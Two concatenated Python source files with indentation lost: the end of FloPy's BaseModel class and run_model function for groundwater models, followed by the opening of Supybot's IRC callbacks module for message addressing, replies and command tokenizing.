for i in range(len(p.name)):
if p.unit_number[i] == 0:
continue
s = '{:14s} '.format(p.name[i]) + \
'{:5d} '.format(p.unit_number[i]) + \
'{}'.format(p.file_name[i])
if p.extra[i]:
s += ' ' + p.extra[i]
lines.append(s)
return '\n'.join(lines) + '\n'
def has_package(self, name):
"""
Check if package name is in package list.
Parameters
----------
name : str
Name of the package, 'DIS', 'BAS6', etc. (case-insensitive).
Returns
-------
bool
True if package name exists, otherwise False if not found.
"""
if not name:
raise ValueError('invalid package name')
name = name.upper()
for p in self.packagelist:
for pn in p.name:
if pn.upper() == name:
return True
return False
def get_package(self, name):
"""
Get a package.
Parameters
----------
name : str
Name of the package, 'RIV', 'LPF', etc. (case-insensitive).
Returns
-------
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
"""
if not name:
raise ValueError('invalid package name')
name = name.upper()
for pp in (self.packagelist):
if pp.name[0].upper() == name:
return pp
return None
def set_version(self, version):
self.version = version.lower()
# check that this is a valid model version
if self.version not in list(self.version_types.keys()):
err = 'Error: Unsupported model ' + \
'version ({}).'.format(self.version) + \
' Valid model versions are:'
for v in list(self.version_types.keys()):
err += ' {}'.format(v)
raise Exception(err)
# set namefile heading
heading = '# Name file for ' + \
'{}, '.format(self.version_types[self.version]) + \
'generated by Flopy version {}.'.format(__version__)
self.heading = heading
# set heading for each package
for p in self.get_package_list():
pak = self.get_package(p)
heading = '# {} package for '.format(pak.name[0]) + \
'{}, '.format(self.version_types[self.version]) + \
'generated by Flopy version {}.'.format(__version__)
pak.heading = heading
return None
def change_model_ws(self, new_pth=None, reset_external=False):
"""
Change the model work space.
Parameters
----------
new_pth : str
Location of new model workspace. If this path does not exist,
it will be created. (default is None, which will be assigned to
the present working directory).
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
if new_pth is None:
new_pth = os.getcwd()
if not os.path.exists(new_pth):
try:
line = '\ncreating model workspace...\n' + \
' {}'.format(new_pth)
print(line)
os.makedirs(new_pth)
except:
line = '\n{} not valid, workspace-folder '.format(new_pth)
raise OSError(line)
# line = '\n{} not valid, workspace-folder '.format(new_pth) + \
# 'was changed to {}\n'.format(os.getcwd())
# print(line)
# new_pth = os.getcwd()
# --reset the model workspace
old_pth = self._model_ws
self._model_ws = new_pth
line = '\nchanging model workspace...\n {}\n'.format(new_pth)
sys.stdout.write(line)
# reset the paths for each package
for pp in (self.packagelist):
pp.fn_path = os.path.join(self.model_ws, pp.file_name[0])
# create the external path (if needed)
if hasattr(self, "external_path") and self.external_path is not None \
and not os.path.exists(os.path.join(self._model_ws,
self.external_path)):
pth = os.path.join(self._model_ws, self.external_path)
os.makedirs(pth)
if reset_external:
self._reset_external(pth, old_pth)
elif reset_external:
self._reset_external(self._model_ws, old_pth)
return None
def _reset_external(self, pth, old_pth):
new_ext_fnames = []
for ext_file, output in zip(self.external_fnames,
self.external_output):
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
# this is a wicked mess
if output:
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
new_ext_file = ext_file
else:
# fpth = os.path.abspath(os.path.join(old_pth, ext_file))
# new_ext_file = os.path.relpath(fpth, os.path.abspath(pth))
fdir = os.path.dirname(ext_file)
if fdir == '':
fpth = os.path.abspath(os.path.join(old_pth, ext_file))
else:
fpth = ext_file
ao = os.path.abspath(os.path.dirname(fpth))
ep = os.path.abspath(pth)
relp = os.path.relpath(ao, ep)
new_ext_file = os.path.join(relp, os.path.basename(ext_file))
new_ext_fnames.append(new_ext_file)
self.external_fnames = new_ext_fnames
@property
def model_ws(self):
return copy.deepcopy(self._model_ws)
def _set_name(self, value):
"""
Set model name
Parameters
----------
value : str
Name to assign to model.
"""
self.__name = str(value)
self.namefile = self.__name + '.' + self.namefile_ext
for p in self.packagelist:
for i in range(len(p.extension)):
p.file_name[i] = self.__name + '.' + p.extension[i]
p.fn_path = os.path.join(self.model_ws, p.file_name[0])
def __setattr__(self, key, value):
if key == "free_format_input":
# if self.bas6 is not None:
# self.bas6.ifrefm = value
super(BaseModel, self).__setattr__(key, value)
elif key == "name":
self._set_name(value)
elif key == "model_ws":
self.change_model_ws(value)
elif key == "sr":
assert isinstance(value, utils.reference.SpatialReference)
warnings.warn(
"SpatialReference has been deprecated.",
category=DeprecationWarning)
if self.dis is not None:
self.dis.sr = value
else:
raise Exception("cannot set SpatialReference -"
"ModflowDis not found")
elif key == "tr":
assert isinstance(value,
discretization.reference.TemporalReference)
if self.dis is not None:
self.dis.tr = value
else:
raise Exception("cannot set TemporalReference -"
"ModflowDis not found")
elif key == "start_datetime":
if self.dis is not None:
self.dis.start_datetime = value
self.tr.start_datetime = value
else:
raise Exception("cannot set start_datetime -"
"ModflowDis not found")
else:
super(BaseModel, self).__setattr__(key, value)
def run_model(self, silent=False, pause=False, report=False,
normal_msg='normal termination'):
"""
This method will run the model using subprocess.Popen.
Parameters
----------
silent : boolean
Echo run information to screen (default is True).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
return run_model(self.exe_name, self.namefile, model_ws=self.model_ws,
silent=silent, pause=pause, report=report,
normal_msg=normal_msg)
def load_results(self):
print('load_results not implemented')
return None
def write_input(self, SelPackList=False, check=False):
"""
Write the input.
Parameters
----------
SelPackList : False or list of packages
"""
if check:
# run check prior to writing input
self.check(f='{}.chk'.format(self.name), verbose=self.verbose,
level=1)
# reset the model to free_format if parameter substitution was
# performed on a model load
if self.parameter_load and not self.free_format_input:
if self.verbose:
print('\nResetting free_format_input to True to ' +
'preserve the precision of the parameter data.')
self.free_format_input = True
if self.verbose:
print('\nWriting packages:')
if SelPackList == False:
for p in self.packagelist:
if self.verbose:
print(' Package: ', p.name[0])
# prevent individual package checks from running after
# model-level package check above
# otherwise checks are run twice
# or the model level check procedure would have to be split up
# or each package would need a check argument,
# or default for package level check would have to be False
try:
p.write_file(check=False)
except TypeError:
p.write_file()
else:
for pon in SelPackList:
for i, p in enumerate(self.packagelist):
if pon in p.name:
if self.verbose:
print(' Package: ', p.name[0])
try:
p.write_file(check=False)
except TypeError:
p.write_file()
break
if self.verbose:
print(' ')
# write name file
self.write_name_file()
# os.chdir(org_dir)
return
def write_name_file(self):
"""
Every Package needs its own writenamefile function
"""
raise Exception(
'IMPLEMENTATION ERROR: writenamefile must be overloaded')
def set_model_units(self):
"""
Every model needs its own set_model_units method
"""
raise Exception(
'IMPLEMENTATION ERROR: set_model_units must be overloaded')
@property
def name(self):
"""
Get model name
Returns
-------
name : str
name of model
"""
return copy.deepcopy(self.__name)
def add_pop_key_list(self, key):
"""
Add a external file unit number to a list that will be used to remove
model output (typically binary) files from ext_unit_dict.
Parameters
----------
key : int
file unit number
Returns
-------
Examples
--------
"""
if key not in self.pop_key_list:
self.pop_key_list.append(key)
def check(self, f=None, verbose=True, level=1):
"""
Check model data for common errors.
Parameters
----------
f : str or file handle
String defining file name or file handle for summary file
of check method output. If a string is passed a file handle
is created. If f is None, check method does not write
results to a summary file. (default is None)
verbose : bool
Boolean flag used to determine if check method results are
written to the screen
level : int
Check method analysis level. If level=0, summary checks are
performed. If level=1, full checks are performed.
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow.load('model.nam')
>>> m.check()
"""
# check instance for model-level check
chk = utils.check(self, f=f, verbose=verbose, level=level)
# check for unit number conflicts
package_units = {}
duplicate_units = {}
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] != 0:
if p.unit_number[i] in package_units.values():
duplicate_units[p.name[i]] = p.unit_number[i]
otherpackage = [k for k, v in package_units.items()
if v == p.unit_number[i]][0]
duplicate_units[otherpackage] = p.unit_number[i]
if len(duplicate_units) > 0:
for k, v in duplicate_units.items():
chk._add_to_summary('Error', package=k, value=v,
desc='unit number conflict')
else:
chk.passed.append('Unit number conflicts')
return self._check(chk, level)
def plot(self, SelPackList=None, **kwargs):
"""
Plot 2-D, 3-D, transient 2-D, and stress period list (MfList)
model input data
Parameters
----------
SelPackList : bool or list
List of of packages to plot. If SelPackList=None all packages
are plotted. (default is None)
**kwargs : dict
filename_base : str
Base file name that will be used to automatically generate file
names for output image files. Plots will be exported as image
files if file_name_base is not None. (default is None)
file_extension : str
Valid matplotlib.pyplot file extension for savefig(). Only used
if filename_base is not None. (default is 'png')
mflay : int
MODFLOW zero-based layer number to return. If None, then all
all layers will be included. (default is None)
kper : int
MODFLOW zero-based stress period number to return.
(default is zero)
key : str
MfList dictionary key. (default is None)
Returns
----------
axes : list
Empty list is returned if filename_base is not None. Otherwise
a list of matplotlib.pyplot.axis are returned.
See Also
--------
Notes
-----
Examples
--------
>>> import flopy
>>> ml = flopy.modflow.Modflow.load('test.nam')
>>> ml.plot()
"""
from flopy.plot import PlotUtilities
axes = PlotUtilities._plot_model_helper(self, SelPackList=SelPackList,
**kwargs)
return axes
def to_shapefile(self, filename, package_names=None, **kwargs):
"""
Wrapper function for writing a shapefile for the model grid. If
package_names is not None, then search through the requested packages
looking for arrays that can be added to the shapefile as attributes
Parameters
----------
filename : string
name of the shapefile to write
package_names : list of package names (e.g. ["dis","lpf"])
Packages to export data arrays to shapefile. (default is None)
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> m.to_shapefile('model.shp', SelPackList)
"""
warnings.warn("to_shapefile() is deprecated. use .export()")
self.export(filename, package_names=package_names)
return
def run_model(exe_name, namefile, model_ws='./',
silent=False, pause=False, report=False,
normal_msg='normal termination', use_async=False,
cargs=None):
"""
This function will run the model using subprocess.Popen. It
communicates with the model's stdout asynchronously and reports
progress to the screen with timestamps
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path. Namefile can be None
to allow programs that do not require a control file (name file)
to be passed as a command line argument.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
silent : boolean
Echo run information to screen (default is True).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str or list
Normal termination message used to determine if the
run terminated normally. More than one message can be provided using
a list. (Default is 'normal termination')
use_async : boolean
asynchronously read model stdout and report with timestamps. good for
models that take long time to run. not good for models that run
really fast
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
success = False
buff = []
# convert normal_msg to a list of lower case str for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg]
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
import platform
if platform.system() in 'Windows':
if not exe_name.lower().endswith('.exe'):
exe = which(exe_name + '.exe')
if exe is None:
s = 'The program {} does not exist or is not executable.'.format(
exe_name)
raise Exception(s)
else:
if not silent:
s = 'FloPy is using the following ' + \
' executable to run the model: {}'.format(exe)
print(s)
if namefile is not None:
if not os.path.isfile(os.path.join(model_ws, namefile)):
s = 'The namefile for this model ' + \
'does not exists: {}'.format(namefile)
raise Exception(s)
# simple little function for the thread to target
def q_output(output, q):
for line in iter(output.readline, b''):
q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe_name]
if namefile is not None:
argv.append(namefile)
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
proc = Popen(argv, stdout=PIPE, stderr=STDOUT, cwd=model_ws)
if not use_async:
while True:
line = proc.stdout.readline().decode('utf-8')
if line == '' and proc.poll() is not None:
break
if line:
for msg in normal_msg:
if msg in line.lower():
success = True
break
line = line.rstrip('\r\n')
if not silent:
print(line)
if report:
buff.append(line)
else:
break
return success, buff
# some tricks for the async stdout reading
q = Queue.Queue()
thread = threading.Thread(target=q_output, args=(proc.stdout, q))
thread.daemon = True
thread.start()
failed_words = ["fail", "error"]
last = datetime.now()
lastsec = 0.
while True:
try:
line = q.get_nowait()
except Queue.Empty:
pass
else:
if line == '':
break
line = line.decode().lower().strip()
if line != '':
now = datetime.now()
dt = now - last
tsecs = dt.total_seconds() - lastsec
line = "(elapsed:{0})-->{1}".format(tsecs, line)
lastsec = tsecs + lastsec
buff.append(line)
if not silent:
print(line)
for fword in failed_words:
if fword in line:
success = False
break
if proc.poll() is not None:
break
proc.wait()
thread.join(timeout=1)
buff.extend(proc.stdout.readlines())
proc.stdout.close()
for line in buff:
for msg in normal_msg:
if msg in line.lower():
print("success")
success = True
break
if pause:
input('Press Enter to continue...')
return success, buff
|
callbacks.py
|
# -*- coding: utf8 -*-
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2014, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
This module contains the basic callbacks for handling PRIVMSGs.
"""
import re
import copy
import time
from . import shlex
import codecs
import getopt
import inspect
from . import (conf, ircdb, irclib, ircmsgs, ircutils, log, registry,
utils, world)
from .utils import minisix
from .utils.iter import any, all
from .i18n import PluginInternationalization
_ = PluginInternationalization()
def _addressed(nick, msg, prefixChars=None, nicks=None,
prefixStrings=None, whenAddressedByNick=None,
whenAddressedByNickAtEnd=None):
def get(group):
if ircutils.isChannel(target):
group = group.get(target)
return group()
def stripPrefixStrings(payload):
for prefixString in prefixStrings:
if payload.startswith(prefixString):
payload = payload[len(prefixString):].lstrip()
return payload
assert msg.command == 'PRIVMSG'
(target, payload) = msg.args
if not payload:
return ''
if prefixChars is None:
prefixChars = get(conf.supybot.reply.whenAddressedBy.chars)
if whenAddressedByNick is None:
whenAddressedByNick = get(conf.supybot.reply.whenAddressedBy.nick)
if whenAddressedByNickAtEnd is None:
r = conf.supybot.reply.whenAddressedBy.nick.atEnd
whenAddressedByNickAtEnd = get(r)
if prefixStrings is None:
prefixStrings = get(conf.supybot.reply.whenAddressedBy.strings)
# We have to check this before nicks -- try "@google supybot" with supybot
# and whenAddressedBy.nick.atEnd on to see why.
if any(payload.startswith, prefixStrings):
return stripPrefixStrings(payload)
elif payload[0] in prefixChars:
return payload[1:].strip()
if nicks is None:
nicks = get(conf.supybot.reply.whenAddressedBy.nicks)
nicks = list(map(ircutils.toLower, nicks))
else:
nicks = list(nicks) # Just in case.
nicks.insert(0, ircutils.toLower(nick))
# Ok, let's see if it's a private message.
if ircutils.nickEqual(target, nick):
payload = stripPrefixStrings(payload)
while payload and payload[0] in prefixChars:
payload = payload[1:].lstrip()
return payload
# Ok, not private. Does it start with our nick?
elif whenAddressedByNick:
for nick in nicks:
lowered = ircutils.toLower(payload)
if lowered.startswith(nick):
try:
(maybeNick, rest) = payload.split(None, 1)
toContinue = False
while not ircutils.isNick(maybeNick, strictRfc=True):
if maybeNick[-1].isalnum():
toContinue = True
break
maybeNick = maybeNick[:-1]
if toContinue:
continue
if ircutils.nickEqual(maybeNick, nick):
return rest
else:
continue
except ValueError: # split didn't work.
continue
elif whenAddressedByNickAtEnd and lowered.endswith(nick):
rest = payload[:-len(nick)]
possiblePayload = rest.rstrip(' \t,;')
if possiblePayload != rest:
# There should be some separator between the nick and the
# previous alphanumeric character.
return possiblePayload
if get(conf.supybot.reply.whenNotAddressed):
return payload
else:
return ''
def addressed(nick, msg, **kwargs):
"""If msg is addressed to 'name', returns the portion after the address.
Otherwise returns the empty string.
"""
payload = msg.addressed
if payload is not None:
return payload
else:
payload = _addressed(nick, msg, **kwargs)
msg.tag('addressed', payload)
return payload
def canonicalName(command, preserve_spaces=False):
"""Turn a command into its canonical form.
Currently, this makes everything lowercase and removes all dashes and
underscores.
"""
if minisix.PY2 and isinstance(command, unicode):
command = command.encode('utf-8')
elif minisix.PY3 and isinstance(command, bytes):
command = command.decode()
special = '\t-_'
if not preserve_spaces:
special += ' '
reAppend = ''
while command and command[-1] in special:
reAppend = command[-1] + reAppend
command = command[:-1]
return ''.join([x for x in command if x not in special]).lower() + reAppend
def reply(*args, **kwargs):
warnings.warn('callbacks.reply is deprecated. Use irc.reply instead.',
DeprecationWarning)
return _makeReply(dynamic.irc, *args, **kwargs)
def _makeReply(irc, msg, s,
prefixNick=None, private=None,
notice=None, to=None, action=None, error=False,
stripCtcp=True):
msg.tag('repliedTo')
# Ok, let's make the target:
# XXX This isn't entirely right. Consider to=#foo, private=True.
target = ircutils.replyTo(msg)
def isPublic(s):
return irc.isChannel(irc.stripChannelPrefix(s))
if to is not None and isPublic(to):
target = to
if isPublic(target):
channel = irc.stripChannelPrefix(target)
else:
channel = None
if notice is None:
notice = conf.get(conf.supybot.reply.withNotice,
channel=channel, network=irc.network)
if private is None:
private = conf.get(conf.supybot.reply.inPrivate,
channel=channel, network=irc.network)
if prefixNick is None:
prefixNick = conf.get(conf.supybot.reply.withNickPrefix,
channel=channel, network=irc.network)
if error:
notice =conf.get(conf.supybot.reply.error.withNotice,
channel=channel, network=irc.network) or notice
private=conf.get(conf.supybot.reply.error.inPrivate,
channel=channel, network=irc.network) or private
s = _('Error: ') + s
if private:
prefixNick = False
if to is None:
target = msg.nick
else:
target = to
if action:
prefixNick = False
if to is None:
to = msg.nick
if stripCtcp:
s = s.strip('\x01')
# Ok, now let's make the payload:
s = ircutils.safeArgument(s)
if not s and not action:
s = _('Error: I tried to send you an empty message.')
if prefixNick and isPublic(target):
# Let's may sure we don't do, "#channel: foo.".
if not isPublic(to):
s = '%s: %s' % (to, s)
if not isPublic(target):
if conf.supybot.reply.withNoticeWhenPrivate():
notice = True
# And now, let's decide whether it's a PRIVMSG or a NOTICE.
msgmaker = ircmsgs.privmsg
if notice:
msgmaker = ircmsgs.notice
# We don't use elif here because actions can't be sent as NOTICEs.
if action:
msgmaker = ircmsgs.action
# Finally, we'll return the actual message.
ret = msgmaker(target, s)
ret.tag('inReplyTo', msg)
return ret
def error(*args, **kwargs):
warnings.warn('callbacks.error is deprecated. Use irc.error instead.',
DeprecationWarning)
return _makeErrorReply(dynamic.irc, *args, **kwargs)
def _makeErrorReply(irc, msg, s, **kwargs):
"""Makes an error reply to msg with the appropriate error payload."""
kwargs['error'] = True
msg.tag('isError')
return _makeReply(irc, msg, s, **kwargs)
def getHelp(method, name=None, doc=None):
if name is None:
name = method.__name__
if doc is None:
if method.__doc__ is None:
doclines = ['This command has no help. Complain to the author.']
else:
doclines = method.__doc__.splitlines()
else:
doclines = doc.splitlines()
s = '%s %s' % (name, doclines.pop(0))
if doclines:
help = ' '.join(doclines)
s = '(%s) -- %s' % (ircutils.bold(s), help)
return utils.str.normalizeWhitespace(s)
def getSyntax(method, name=None, doc=None):
if name is None:
name = method.__name__
if doc is None:
doclines = method.__doc__.splitlines()
else:
doclines = doc.splitlines()
return '%s %s' % (name, doclines[0])
class Error(Exception):
"""Generic class for errors in Privmsg callbacks."""
pass
class ArgumentError(Error):
"""The bot replies with a help message when this is raised."""
pass
class SilentError(Error):
"""An error that we should not notify the user."""
pass
class Tokenizer(object):
# This will be used as a global environment to evaluate strings in.
# Evaluation is, of course, necessary in order to allow escaped
# characters to be properly handled.
#
# These are the characters valid in a token. Everything printable except
# double-quote, left-bracket, and right-bracket.
separators = '\x00\r\n \t'
def __init__(self, brackets='', pipe=False, quotes='"'):
if brackets:
self.separators += brackets
self.left = brackets[0]
self.right = brackets[1]
else:
self.left = ''
self.right = ''
self.pipe = pipe
if self.pipe:
self.separators += '|'
self.quotes = quotes
self.separators += quotes
def _handleToken(self, token):
if token[0] == token[-1] and token[0] in self.quotes:
token = token[1:-1]
# FIXME: No need to tell you this is a hack.
# It has to handle both IRC commands and serialized configuration.
#
# Whoever you are, if you make a single modification to this
# code, TEST the code with Python 2 & 3, both with the unit
# tests and on IRC with this: @echo "好"
if minisix.PY2:
try:
token = token.encode('utf8').decode('string_escape')
token = token.decode('utf8')
except:
token = token.decode('string_escape')
else:
token = codecs.getencoder('utf8')(token)[0]
token = codecs.getdecoder('unicode_escape')(token)[0]
try:
token = token.encode('iso-8859-1').decode()
except: # Prevent issue with tokens like '"\\x80"'.
pass
return token
def _insideBrackets(self, lexer):
ret = []
while True:
token = lexer.get_token()
if not token:
raise SyntaxError(_('Missing "%s". You may want to '
'quote your arguments with double '
'quotes in order to prevent extra '
'brackets from being evaluated '
'as nested commands.') % self.right)
elif token == self.right:
return ret
elif token == self.left:
ret.append(self._insideBrackets(lexer))
else:
ret.append(self._handleToken(token))
return ret
def tokenize(self, s):
lexer = shlex.shlex(minisix.io.StringIO(s))
lexer.commenters = ''
lexer.quotes = self.quotes
lexer.separators = self.separators
args = []
ends = []
while True:
token = lexer.get_token()
if not token:
break
elif token == '|' and self.pipe:
# The "and self.pipe" might seem redundant here, but it's there
# for strings like 'foo | bar', where a pipe stands alone as a
# token, but shouldn't be treated specially.
if not args:
raise SyntaxError(_('"|" with nothing preceding. I '
'obviously can\'t do a pipe with '
'nothing before the |.'))
ends.append(args)
args = []
elif token == self.left:
args.append(self._insideBrackets(lexer))
elif token == self.right:
raise SyntaxError(_('Spurious "%s". You may want to '
'quote your arguments with double '
'quotes in order to prevent extra '
'brackets from being evaluated '
'as nested commands.') % self.right)
else:
args.append(self._handleToken(token))
if ends:
if not args:
raise SyntaxError(_('"|" with nothing following. I '
'obviously can\'t do a pipe with '
'nothing after the |.'))
args.append(ends.pop())
while ends:
args[-1].append(ends.pop())
return args
def tokenize(s, channel=None, network=None):
"""A utility function to create a Tokenizer and tokenize a string."""
pipe = False
brackets = ''
nested = conf.supybot.commands.nested
if nested():
brackets = nested.brackets.getSpecific(network, channel)()
if conf.get(nested.pipeSyntax,
channel=channel, network=network): # No nesting, no pipe.
pipe = True
quotes = conf.supybot.commands.quotes.getSpecific(network, channel)()
try:
ret = Tokenizer(brackets=brackets,pipe=pipe,quotes=quotes).tokenize(s)
return ret
except ValueError as e:
raise SyntaxError(str(e))
def formatCommand(command):
return ' '.join(command)
def checkCommandCapability(msg, cb, commandName):
plugin = cb.name().lower()
if not isinstance(commandName, minisix.string_types):
assert commandName[0] == plugin, ('checkCommandCapability no longer '
'accepts command names that do not start with the callback\'s '
'name (%s): %s') % (plugin, commandName)
commandName = '.'.join(commandName)
def checkCapability(capability):
assert ircdb.isAntiCapability(capability)
if ircdb.checkCapability(msg.prefix, capability):
log.info('Preventing %s from calling %s because of %s.',
msg.prefix, commandName, capability)
raise RuntimeError(capability)
try:
antiCommand = ircdb.makeAntiCapability(commandName)
checkCapability(antiCommand)
checkAtEnd = [commandName]
default = conf.supybot.capabilities.default()
if msg.channel:
channel = msg.channel
checkCapability(ircdb.makeChannelCapability(channel, antiCommand))
chanCommand = ircdb.makeChannelCapability(channel, commandName)
checkAtEnd += [chanCommand]
default &= ircdb.channels.getChannel(channel).defaultAllow
return not (default or \
any(lambda x: ircdb.checkCapability(msg.prefix, x),
checkAtEnd))
except RuntimeError as e:
s = ircdb.unAntiCapability(str(e))
return s
class RichReplyMethods(object):
"""This is a mixin so these replies need only be defined once. It operates
under several assumptions, including the fact that 'self' is an Irc object
of some sort and there is a self.msg that is an IrcMsg."""
def __makeReply(self, prefix, s):
if s:
s = '%s %s' % (prefix, s)
else:
s = prefix
return ircutils.standardSubstitute(self, self.msg, s)
def _getConfig(self, wrapper):
return conf.get(wrapper,
channel=self.msg.channel, network=self.irc.network)
def replySuccess(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.success)
if v:
s = self.__makeReply(v, s)
return self.reply(s, **kwargs)
else:
self.noReply()
def replyError(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.error)
if 'msg' in kwargs:
msg = kwargs['msg']
if ircdb.checkCapability(msg.prefix, 'owner'):
v = self._getConfig(conf.supybot.replies.errorOwner)
s = self.__makeReply(v, s)
return self.reply(s, **kwargs)
def _getTarget(self, to=None):
"""Compute the target according to self.to, the provided to,
and self.private, and return it. Mainly used by reply methods."""
# FIXME: Don't set self.to.
# I still set it to be sure I don't introduce a regression,
# but it does not make sense for .reply() and .replies() to
# change the state of this Irc object.
if to is not None:
self.to = self.to or to
target = self.private and self.to or self.msg.args[0]
return target
def replies(self, L, prefixer=None, joiner=None,
onlyPrefixFirst=False,
oneToOne=None, **kwargs):
if prefixer is None:
prefixer = ''
if joiner is None:
joiner = utils.str.commaAndify
if isinstance(prefixer, minisix.string_types):
prefixer = prefixer.__add__
if isinstance(joiner, minisix.string_types):
joiner = joiner.join
to = self._getTarget(kwargs.get('to'))
if oneToOne is None: # Can be True, False, or None
if self.irc.isChannel(to):
oneToOne = conf.get(conf.supybot.reply.oneToOne,
channel=to, network=self.irc.network)
else:
oneToOne = conf.supybot.reply.oneToOne()
if oneToOne:
return self.reply(prefixer(joiner(L)), **kwargs)
else:
msg = None
first = True
for s in L:
if onlyPrefixFirst:
if first:
first = False
msg = self.reply(prefixer(s), **kwargs)
else:
msg = self.reply(s, **kwargs)
else:
msg = self.reply(prefixer(s), **kwargs)
return msg
def noReply(self, msg=None):
self.repliedTo = True
def _error(self, s, Raise=False, **kwargs):
if Raise:
raise Error(s)
else:
return self.error(s, **kwargs)
def errorNoCapability(self, capability, s='', **kwargs):
if 'Raise' not in kwargs:
kwargs['Raise'] = True
log.warning('Denying %s for lacking %q capability.',
self.msg.prefix, capability)
# noCapability means "don't send a specific capability error
# message" not "don't send a capability error message at all", like
# one would think
if self._getConfig(conf.supybot.reply.error.noCapability) or \
capability in conf.supybot.capabilities.private():
v = self._getConfig(conf.supybot.replies.genericNoCapability)
else:
v = self._getConfig(conf.supybot.replies.noCapability)
try:
v %= capability
except TypeError: # No %s in string
pass
s = self.__makeReply(v, s)
if s:
return self._error(s, **kwargs)
elif kwargs['Raise']:
raise Error()
def errorPossibleBug(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.possibleBug)
if s:
s += ' (%s)' % v
else:
s = v
return self._error(s, **kwargs)
def errorNotRegistered(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.notRegistered)
return self._error(self.__makeReply(v, s), **kwargs)
def errorNoUser(self, s='', name='that user', **kwargs):
if 'Raise' not in kwargs:
kwargs['Raise'] = True
v = self._getConfig(conf.supybot.replies.noUser)
try:
v = v % name
except TypeError:
log.warning('supybot.replies.noUser should have one "%s" in it.')
return self._error(self.__makeReply(v, s), **kwargs)
def errorRequiresPrivacy(self, s='', **kwargs):
v = self._getConfig(conf.supybot.replies.requiresPrivacy)
return self._error(self.__makeReply(v, s), **kwargs)
def errorInvalid(self, what, given=None, s='', repr=True, **kwargs):
if given is not None:
if repr:
given = _repr(given)
else:
given = '"%s"' % given
v = _('%s is not a valid %s.') % (given, what)
else:
v = _('That\'s not a valid %s.') % what
if 'Raise' not in kwargs:
kwargs['Raise'] = True
if s:
v += ' ' + s
return self._error(v, **kwargs)
_repr = repr
class ReplyIrcProxy(RichReplyMethods):
"""This class is a thin wrapper around an irclib.Irc object that gives it
the reply() and error() methods (as well as everything in RichReplyMethods,
based on those two)."""
def __init__(self, irc, msg):
self.irc = irc
self.msg = msg
self.getRealIrc()._setMsgChannel(self.msg)
def getRealIrc(self):
"""Returns the real irclib.Irc object underlying this proxy chain."""
if isinstance(self.irc, irclib.Irc):
return self.irc
else:
return self.irc.getRealIrc()
# This should make us be considered equal to our irclib.Irc object for
# hashing; an important thing (no more "too many open files" exceptions :))
def __hash__(self):
return hash(self.getRealIrc())
def __eq__(self, other):
return self.getRealIrc() == other
__req__ = __eq__
def __ne__(self, other):
return not (self == other)
__rne__ = __ne__
def error(self, s, msg=None, **kwargs):
if 'Raise' in kwargs and kwargs['Raise']:
raise Error()
if msg is None:
msg = self.msg
if s:
m = _makeErrorReply(self, msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def reply(self, s, msg=None, **kwargs):
if msg is None:
msg = self.msg
assert not isinstance(s, ircmsgs.IrcMsg), \
'Old code alert: there is no longer a "msg" argument to reply.'
kwargs.pop('noLengthCheck', None)
m = _makeReply(self, msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def __getattr__(self, attr):
return getattr(self.irc, attr)
SimpleProxy = ReplyIrcProxy # Backwards-compatibility
class NestedCommandsIrcProxy(ReplyIrcProxy):
